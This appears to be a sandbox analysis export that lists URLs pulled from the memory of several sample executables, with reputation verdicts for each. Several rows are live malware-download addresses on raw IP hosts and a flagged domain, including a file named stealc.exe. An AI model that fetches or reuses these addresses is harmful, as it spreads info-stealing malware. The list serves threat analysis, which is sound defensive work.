http://www.galapagosdesign.com/DPlease	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://st6-21.vk.com/css/al/base.3e47d375.css	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.vk.com	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919702157.00000134161BF000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1965929356.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922349963.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1918149779.0000013415BF2000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922003673.00000134161E0000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917402088.0000013415BF2000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1918149779.0000013415BE5000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917402088.0000013415BDF000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1985145992.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1918216966.000001341619A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1990338824.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1990503386.0000013415B86000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1918908601.00000134161A8000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922153386.0000013416197000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66b24859611ad_agent_3.exedu	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922349963.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910883394.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906388767.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911269649.0000013415B74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ton.twimg.com	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/armadegon.exe=	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906261672.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911172424.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915315001.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://api.ip.sb/ip	bQnXcKn6ehLDJGqEStjbnSyC.exe, 00000008.00000002.3000839541.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66b5b75106ac6_stealc.exe#spaceet	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.000001341418F000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906543766.0000013414193000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910946905.0000013414193000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966640010.0000013414193000.00000004.00000020.00020000.00000000.sdmp	false	23%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://mozilla.org0/	NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66b45c742e0a1_123p.exea	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906138994.0000013415BF2000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1909411283.0000013415BF2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/pech0nkhellosqlr.dllsqlite3.dllIn	NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66b24859611ad_agent_3.exe$so	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.0000013416179000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/N	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.0000013414149000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1838462230.0000013414150000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stats.vk-portal.net	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vk.com/browser_reports?dest=default_reports	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/7	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1838462230.0000013414150000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tagmanager.google.com	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66b45c742e0a1_123p.exeJ	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922349963.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910883394.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906388767.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911269649.0000013415B74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s.ytimg.com	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ipinfo.io/	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1838462230.0000013414150000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://r.mradx.net	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/pech0nk	NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.58.114.223/d/525403ty	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.000001341418F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://st6-21.vk.com/css/al/fonts_utf.7fa94ada.css	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.vk.me	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/armadegon.exe$C	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.0000013414149000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://vk.com:80/doc869877400_679230593?hash=JDs0Rq6RGgLMWXUFzWMB8cYHTybh6lXFwxmcZ1ZeK2w&dl=uMxA8hZ	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906261672.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911172424.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915315001.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66b5d9d3adbaa_defaultr.exe#spacet	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.000001341418F000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906543766.0000013414193000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910946905.0000013414193000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966640010.0000013414193000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66b45c742e0a1_123p.exe)	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906138994.0000013415BF2000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1909411283.0000013415BF2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66b5d9d3adbaa_defaultr.exe#spacen	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906431495.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915315001.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911172424.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fontbureau.com/designers/?	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66b5b75106ac6_stealc.exe#spaceT	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.000001341418F000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906543766.0000013414193000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910946905.0000013414193000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966640010.0000013414193000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.fontbureau.com/designers?	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://helleaa.com/temp/random.exe0309	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.000001341418F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://helleaa.com/	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922349963.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910883394.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.0000013414149000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906388767.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911269649.0000013415B74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.tiro.com	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com/	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906431495.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.0000013414149000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.vk.com/?act=logout&hash=813a7246a1621e9e4f&_origin=https%3A%2F%2Fvk.com&lrt=BDpxh3TFcr	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://helleaa.com:80/temp/random.exe	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906201987.0000013414149000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://st6-21.vk.com	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ampproject.org	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.58.114.223/d/525403e	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906261672.0000013415B8C000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1965929356.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911172424.0000013415B8F000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915315001.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1985145992.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415B8C000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1990338824.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1990503386.0000013415B86000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66b5d9d3adbaa_defaultr.exe#spacee	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906431495.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911146573.0000013415BD2000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915454980.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BD5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.openssl.org/support/faq.html	NjdbLPleIutA8FKI_S3fRztd.exe, 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66b24859611ad_agent_3.exeD	284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922349963.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910883394.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906388767.0000013415B75000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911269649.0000013415B74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	eROo1ugNChgONSxoiS6DxyMi.exe, 00000009.00000002.2836924084.0000000006A82000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	NjdbLPleIutA8FKI_S3fRztd.exe, 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
